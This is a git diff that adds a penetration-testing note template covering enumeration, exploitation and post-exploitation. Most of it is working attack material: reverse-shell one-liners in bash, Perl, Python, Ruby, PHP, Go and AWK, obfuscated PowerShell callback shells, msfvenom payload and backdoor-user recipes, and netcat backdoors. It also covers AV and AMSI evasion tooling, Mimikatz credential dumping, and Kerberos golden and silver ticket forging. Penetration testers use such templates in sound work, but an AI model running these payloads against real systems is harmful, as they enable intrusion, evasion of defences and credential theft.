+- python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -U
+
+
+
+## References: 
+
+- PayloadAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#most-common-paths-to-ad-compromise
+
+- Attacking Active Directory: 0 to 0.9:
+https://zer1t0.gitlab.io/posts/attacking_ad/
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/General Notes.md
new file mode 100644
index 0000000..5ba634a
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/General Notes.md	
@@ -0,0 +1,57 @@
+SNMP Walk: 
+
+
+- snmpwalk -c public -v1 ipaddress 1
+- snmpwalk -c private -v1 ipaddress 1
+- snmpwalk -c manager -v1 ipaddress 1
+
+
+Nmap: 
+
+- nmap 172.21.0.0 -Pn -sU -p 161 --script=
+
+/usr/share/nmap/scripts/snmp-brute.nse
+/usr/share/nmap/scripts/snmp-hh3c-logins.nse
+/usr/share/nmap/scripts/snmp-info.nse
+/usr/share/nmap/scripts/snmp-interfaces.nse
+/usr/share/nmap/scripts/snmp-ios-config.nse
+/usr/share/nmap/scripts/snmp-netstat.nse
+/usr/share/nmap/scripts/snmp-processes.nse
+/usr/share/nmap/scripts/snmp-sysdescr.nse
+/usr/share/nmap/scripts/snmp-win32-services.nse
+/usr/share/nmap/scripts/snmp-win32-shares.nse
+/usr/share/nmap/scripts/snmp-win32-software.nse
+/usr/share/nmap/scripts/snmp-win32-users.nse
+
+Metasploit aux modules: 
+
+ auxiliary/scanner/misc/oki_scanner                                    
+ auxiliary/scanner/snmp/aix_version                                   
+ auxiliary/scanner/snmp/arris_dg950                                   
+ auxiliary/scanner/snmp/brocade_enumhash                               
+ auxiliary/scanner/snmp/cisco_config_tftp                               
+ auxiliary/scanner/snmp/cisco_upload_file                              
+ auxiliary/scanner/snmp/cnpilot_r_snmp_loot                             
+ auxiliary/scanner/snmp/epmp1000_snmp_loot                             
+ auxiliary/scanner/snmp/netopia_enum                                    
+ auxiliary/scanner/snmp/sbg6580_enum                                 
+ auxiliary/scanner/snmp/snmp_enum                                 
+ auxiliary/scanner/snmp/snmp_enum_hp_laserjet                           
+ auxiliary/scanner/snmp/snmp_enumshares                                
+ auxiliary/scanner/snmp/snmp_enumusers                                 
+ auxiliary/scanner/snmp/snmp_login                                     
+
+
+Onesixtyone: 
+
+- onesixtyone -c /usr/share/doc/onesixtyone/dict.txt 172.21.0.X
+
+Snmp-check
+
+
+- snmp-check 172.21.0.0 -c public
+
+
+Impacket: 
+
+- python3 samdump.py SNMP 172.21.0.0
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/5. FTP/General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/5. FTP/General Notes.md
new file mode 100644
index 0000000..3b36bf7
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/5. FTP/General Notes.md	
@@ -0,0 +1,27 @@
+# FTP Enumeration Tools
+
+### Nmap Enumeration
+```
+$ ls -lh /usr/share/nmap/scripts/ | grep ftp
+-rw-r--r-- 1 root root 4.5K Oct 12 09:29 ftp-anon.nse
+-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-bounce.nse
+-rw-r--r-- 1 root root 3.1K Oct 12 09:29 ftp-brute.nse
+-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-libopie.nse
+-rw-r--r-- 1 root root 3.3K Oct 12 09:29 ftp-proftpd-backdoor.nse
+-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ftp-syst.nse
+-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ftp-vsftpd-backdoor.nse
+-rw-r--r-- 1 root root 5.8K Oct 12 09:29 ftp-vuln-cve2010-4221.nse
+-rw-r--r-- 1 root root 5.7K Oct 12 09:29 tftp-enum.nse
+$ nmap x.x.x.x -p 21 -sV --script=exampleScript1.nse,exampleScript2.nse
+```
+### Manual Connection
+```
+$ ftp x.x.x.x
+```
+```
+$ nc x.x.x. 21
+```
+### Connect via Browser
+```
+ftp://x.x.x.x
+```
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/6. TCP/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/6. TCP/Target _1.md
new file mode 100644
index 0000000..9aaf438
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/6. TCP/Target _1.md	
@@ -0,0 +1,6 @@
+# Fill in results or other information about your target here: 
+
+
+
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/7. UDP/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/7. UDP/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/7. UDP/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/8. Other/Target _1.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/8. Other/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/8. Other/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/1. General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/1. General Notes.md
new file mode 100644
index 0000000..e08f878
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/1. General Notes.md	
@@ -0,0 +1,112 @@
+## Pre-requisites for runninging exploits
+
+- Check the version of the operating system.
+- Check the software version.
+- Check if there is exploit for it (Searchsploit, ExploitDB, Google, etc).
+- If you have an exploit, is there a Metasploit Module for it?
+
+
+## Default Credentials
+
+- https://cirt.net/passwords
+- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
+
+## Reverse Shells
+
+Bash: 
+
+- bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1
+
+Perl:
+
+```
+perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+```
+
+Python: 
+
+- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+
+IPv6: 
+
+- python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' 
+
+Ruby:
+
+- ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
+- ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+
+
+PHP:
+
+Pentest Monkey Reverse Shell for PHP:
+In Kali: 
+
+/usr/share/webshells/php/php-reverse-shell.php
+
+Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
+
+- php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
+
+Windows Powershell Oneliner: 
+
+Note: To change the IP Address replace the number values in Check.for.Callback.Connection. To change the port pick your own numeric values to equal the number you want your shell to callback to you. 
+
+```
+# Offsec-callback-v2
+$ezYSZf = & ((Get-Command "New-ScheduledJobOption").name[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Check.for.Callback.Connection".Replace("Check",127).Replace("For",0+255-255).Replace("Callback", 0+234-234).Replace("Connection",0+0+0+1),(443*2-443));
+$VXm = $ezYSZf.GetStream();
+# checkin to target
+[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0};
+while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0)
+{;
+$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i);
+$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String );
+# AND
+$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_}));
+$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT);
+$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush()
+};
+Start-Sleep -Seconds 5
+# checkout of target
+$ezYSZf.Close()
+```
+
+Linux Powershell Oneliner:
+
+```
+$ezYSZf = & (("New-ScheduledJobOption")[0,1,2,3,14,15,13,1,5,18] -join '') ([string]::join('', ( (83,121,115,116,101,109,46,78,101,116,46,83,111,99,107,101,116,115,46,84,67,80,67,108,105,101,110,116) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})("Stay.Off.Ronins.Lawn".Replace("Stay",127).Replace("Off",0+255-255).Replace("Ronins", 0+1-1).Replace("Lawn",0+0+0+1),(443*2-443));
+$VXm = $ezYSZf.GetStream();
+[byte[]]$0bLXRjHKPvWQUhq = (10023-10023)..(13107*5)|<##>%{$_}<##>|%{0};
+while(($i = $VXm.Read($0bLXRjHKPvWQUhq, 0, $0bLXRjHKPvWQUhq.Length)) -ne 0)
+{;
+$Tc9dYRLI5 = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($0bLXRjHKPvWQUhq,0, $i);
+$sendback = (iex $Tc9dYRLI5 2>&1 |<##>%{$_}<##>| Out-String );
+$YzlnHIRT = $sendback + $(([string]::join('', ( (80,83,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_})) + (pwd).Path + $(([string]::join('', ( (62,62,32) |<##>%{$_}<##>|%{ ( [char][int] $_)})) |<##>%{$_}<##>| % {$_}));
+$sdfghjklASDA222 = ([text.encoding]::ASCII).GetBytes($YzlnHIRT);
+$VXm.Write($sdfghjklASDA222,0,$sdfghjklASDA222.Length);$VXm.Flush()
+};
+$ezYSZf.Close()
+```
+
+Golang: 
+
+- echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
+
+AWK: 
+
+- awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
+
+
+Other Reverse Shell: 
+https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
+
+
+## Other Resources 
+
+- Amsi-Bypass-Powershell: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 
+
+
+
+
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypass Windows Amsi.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypass Windows Amsi.md
new file mode 100644
index 0000000..4c66979
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypass Windows Amsi.md	
@@ -0,0 +1,14 @@
+## Testing for Amsi Bypass:
+
+- https://github.com/rasta-mouse/AmsiScanBufferBypass
+
+## Amsi-Bypass-Powershell
+
+- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
+
+## Resources:
+
+- https://blog.f-secure.com/hunting-for-amsi-bypasses/
+- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
+- https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
+- https://slaeryan.github.io/posts/falcon-zero-alpha.html
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypassing AV.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypassing AV.md
new file mode 100644
index 0000000..465b6bc
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Bypassing AV.md	
@@ -0,0 +1,55 @@
+## Veil Framework:
+
+Install on Kali: 
+- apt install veil
+- /usr/share/veil/config/setup.sh --force --silent
+
+Reference: https://github.com/Veil-Framework/Veil
+
+## Shellter
+
+Source: https://www.shellterproject.com/download/
+
+- apt install shellter
+
+
+## Sharpshooter
+
+Javascript Payload Stageless: 
+- SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
+
+Stageless HTA Payload: 
+
+- SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
+
+Staged VBS:
+
+- SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
+
+Reference: https://github.com/mdsecactivebreach/SharpShooter
+
+## Donut: 
+
+Source: https://github.com/TheWover/donut
+
+## Vulcan
+
+Source: https://github.com/praetorian-code/vulcan
+
+
+## Scarecrow
+
+Source: https://github.com/optiv/ScareCrow
+
+In Kali: 
+
+sudo apt install golang
+
+go get github.com/fatih/color
+go get github.com/yeka/zip
+go get github.com/josephspurrier/goversioninfo
+
+go build ScareCrow.go
+
+./ScareCrow
+
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Msfvenom.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Msfvenom.md
new file mode 100644
index 0000000..f758318
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Msfvenom.md	
@@ -0,0 +1,86 @@
+## Creating a payload
+
+- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]
+
+To view list of payloads: msfvenom -l payloads
+To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options
+
+## Creating a payload with encoding
+
+- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] <var=value> > outputfile
+
+## Creating a payload using a template
+
+- msfvenom -p [payload] <var=value> -x [template] -f [formattype] > outputfile
+
+## Listening for MSfvenom Payloads:
+
+```
+msf5>use exploit/multi/handler  
+msf5>set payload windows/meterpreter/reverse_tcp  
+msf5>set lhost <IP>  
+msf5>set lport <PORT>  
+msf5> set ExitOnSession false  
+msf5>exploit -j  
+```
+
+## Windows Payloads
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
+- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe	
+- msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe	
+- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe	
+- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
+
+## Linux Payloads
+
+- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf	
+- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
+- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf	
+- msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
+
+Add a user in windows with msfvenom: 
+
+- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe
+
+## Web Payloads
+
+PHP
+
+- msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
+cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
+
+ASP
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
+
+JSP
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
+
+WAR
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
+
+## Scripting Payloads
+
+Python
+
+- msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
+
+Bash
+
+- msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
+
+Perl
+
+- msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
+
+
+Creating an Msfvenom Payload with an encoder while removing bad charecters:
+
+- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"
+
+## Resources:
+
+- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Netcat Tips.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Netcat Tips.md
new file mode 100644
index 0000000..93a442b
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Netcat Tips.md	
@@ -0,0 +1,28 @@
+## Fundamentals:
+
+Connect to a netcat client:
+- rlwrap nc [IP Address] [port]
+
+Connect to a netcat Listener:
+
+- rlwrap nc -lvp [Localport]
+
+More info on rlwrap: https://linux.die.net/man/1/rlwrap
+
+## Backdoor Shells: 
+
+Linux: 
+
+- rlwrap nc [Your IP Address] -e /bin/sh 
+- rlwrap nc [Your IP Address] -e /bin/bash
+- rlwrap nc [Your IP Address] -e /bin/zsh
+- rlwrap nc [Your IP Address] -e /bin/ash
+
+
+Windows: 
+
+- rlwrap nc -lv [localport] -e cmd.exe
+
+Linux netcat reverse shell: 
+
+- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Searchsploit.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Searchsploit.md
new file mode 100644
index 0000000..7dd2010
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Searchsploit.md	
@@ -0,0 +1,39 @@
+## Installing searchsploit (Already in Kali)
+
+- apt update && apt install exploitdb
+
+## Install binsploits
+Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection. 
+
+- apt update && apt install exploitdb-bin-sploits
+
+## updating searchsploit
+
+- searchsploit -u
+
+## Basic Searching: 
+
+- searchsploit <program> <Operating System> <programming language> <version #> etc
+- searchsploit -t php windows
+
+## Exclude unwanted results
+- searchsploit linux kernel 5.2 --exclude="Poc"
+
+## View exploits from Searchsploit
+- searchsploit 9542 --examine
+- searchsploit -x window/remote/42031.py
+
+
+## Copy exploit to current working directory
+- searchsploit -m <Exploit Title> <Path>
+
+## Access Exploits from Exploit-DB website: 
+- searchsploit vsftpd 2.3.4 -w
+
+## Run an nmap scan result through searchsploit: 
+1. Nmap -Pn 172.21.0.0 -oX results.xml
+2. searchsploit -x --nmap results.xml
+
+Referneces: 
+
+- https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Target _1/Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Target _1/Notes.md
new file mode 100644
index 0000000..e69de29
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/1. General Notes.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/1. General Notes.md
new file mode 100644
index 0000000..9a4c523
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/1. General Notes.md	
@@ -0,0 +1,45 @@
+## Spawn a tty: 
+
+1. rlwrap nc localhost 80
+
+2. rlwrap -r -f . nc <IP ADDRESS> <PORT>
+
+- socat file:`tty`,raw,echo=0 tcp-listen:12345
+- /bin/sh -i
+- /bin/bash -i
+- python -c 'import pty; pty.spawn("/bin/sh")'
+- perl -e 'exec "/bin/sh";'
+- perl: exec "/bin/sh";
+- ruby: exec "/bin/sh"
+- lua: os.execute('/bin/sh')
+
+## Priviledge Escalation Scripts:
+
+Windows:
+- Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng
+- Sherlock: https://github.com/rasta-mouse/Sherlock
+- Powersploit: https://github.com/PowerShellMafia/PowerSploit
+- WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
+- PrivescCheck: https://github.com/itm4n/PrivescCheck 
+
+Linux:
+- Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
+- LinEnum: https://github.com/rebootuser/LinEnum
+- UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check
+- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
+
+## Other Resources: 
+
+PowerSharpPack:
+- https://github.com/S3cur3Th1sSh1t/PowerSharpPack 
+
+Windows: 
+- LOLBAS: https://lolbas-project.github.io/#
+- Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html
+- SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite
+- Watson: https://github.com/rasta-mouse/Watson
+- WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn
+
+Linux: 
+- GTFOBins: https://gtfobins.github.io/
+- g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/2. C2 Frameworks.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/2. C2 Frameworks.md
new file mode 100644
index 0000000..b4e7453
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/2. C2 Frameworks.md	
@@ -0,0 +1,36 @@
+## Empire C2:
+
+Github: https://github.com/BC-SECURITY/Empire
+
+In Kali Linux: 
+
+apt install powershell-empire
+
+Install Empire Manually:
+
+1. cd /Empire/setup
+2. ./install.sh
+
+- Current Listeners: 
+
+(Empire) > listeners
+[!] No listeners currently active
+(Empire: listeners) > uselistener 
+dbx           http          http_com      http_foreign  http_hop      http_mapi     meterpreter   onedrive      redirector   
+
+
+## Covenant
+
+Source: https://github.com/cobbr/Covenant
+
+In Kali Repo:
+
+sudo apt install covenant-kbx
+
+Installing manually on Kali: 
+
+1. apt install dotnet-sdk-2.2
+2. git clone --recurse-submodules https://github.com/cobbr/Covenant
+3. cd Covenant/Covenant
+4. dotnet build
+5. dotnet run
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/BloodHound.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/BloodHound.md
new file mode 100644
index 0000000..0ed9250
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/BloodHound.md	
@@ -0,0 +1,25 @@
+## Source: 
+
+https://github.com/BloodHoundAD/BloodHound
+
+## Pre-Compiled Binaries
+
+https://github.com/BloodHoundAD/BloodHound/releases
+
+## SharpHound: 
+
+https://github.com/BloodHoundAD/SharpHound3
+
+## Bloodhound for python 
+Note: Only compatiable with BloodHound 3.0 or newer
+
+https://github.com/fox-it/BloodHound.py
+
+## Install on Kali:
+
+apt install bloodhound
+
+## Gather Data
+
+- import-module .\sharphound.ps1
+- invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Impacket.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Impacket.md
new file mode 100644
index 0000000..cc20009
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Impacket.md	
@@ -0,0 +1,11 @@
+# Generate Silver Tickets with Impacket:
+- python3 ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
+- python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
+
+# Generate Golden Tickets:
+- python3 ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
+- python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
+
+# Credential Access with Secretsdump
+
+- impacket-secretsdump username@target-ip -dc-ip target-ip
\ No newline at end of file
diff --git a/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Mimikatz.md b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Mimikatz.md
new file mode 100644
index 0000000..c7cb78f
--- /dev/null
+++ b/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Mimikatz.md	
@@ -0,0 +1,50 @@
+# Mimikatz
+
+Post exploitation commands must be executed from SYSTEM level privileges.
+- mimikatz # privilege::debug
+- mimikatz # token::whoami
+- mimikatz # token::elevate
+- mimikatz # lsadump::sam
+- mimikatz # sekurlsa::logonpasswords
+
+## Pass The Hash
+
+- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash
+
+## Inject generated TGS key
+
+- mimikatz # kerberos::ptt <ticket_kirbi_file>
+
+## Generating a silver ticket 
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
+
+AES 128 Key:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
+
+
+## Generating a Golden Ticket
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
+
+AES 128 Key: 
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
+
+
+
+
+
